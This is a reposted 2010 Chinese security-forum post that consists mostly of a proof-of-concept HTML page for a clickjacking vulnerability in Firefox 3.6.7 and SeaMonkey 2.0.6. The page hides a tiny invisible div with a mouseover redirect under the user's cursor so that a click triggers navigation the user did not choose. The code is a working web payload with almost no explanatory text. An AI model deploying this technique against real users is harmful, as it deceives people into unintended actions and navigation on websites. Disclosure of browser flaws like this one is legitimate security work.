-
-
[转帖]Multiple Web Browser Clickjacking Vulnerability (FF3.6.7/SM 2.0.6)
-
发表于: 2010-7-24 03:35 3475
-
[转帖]Multiple Web Browser Clickjacking Vulnerability (FF3.6.7/SM 2.0.6)


2010-7-24 03:35
3475
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 | <html>< head > <meta http-equiv= "content-type" content= "text/html; charset=UTF-8" > <title>FF3.6.7 /SM 2.0.6 ClickJacking Vulnerability< /title > < /head ><body> <div id = "mydiv" onmouseover= "document.location='http://www.mozilla.org';" style= "border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 2px; height: 2px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" >< /div > <script> function clickjack_armor(evt) { clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX; clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById( 'mydiv' ).style.left=clickjack_mouseX-1; document.getElementById( 'mydiv' ).style. top =clickjack_mouseY-1; } < /script > <center> <br> <center><h1><font face= "Calibri" >Firefox 3.6.7 / SeaMonkey 2.0.6 Clickjacking Vulnerability< /font >< /h1 > <p> < /p > <div style= "border-top-style: solid; border-top-width: 1px; padding-top: 1px" > <b><br><br> <a href= "http://http://www.Securitylab.ir" onclick= "clickjack_armor(event)" > Go to the http: //www .Securitylab.ir : (http: //www .mozilla.org)< /a >< /b >< /div > <div style= "border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 1px" > <p> < /div > <p> < /p > < /center > <div style= "border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px" > <b><font face= "Calibri" >Pouya Daneshmand, Securitylab.ir< /font >< /b >< /div > < /center >< /body >< /html > |
赞赏
他的文章
赞赏
雪币:
留言: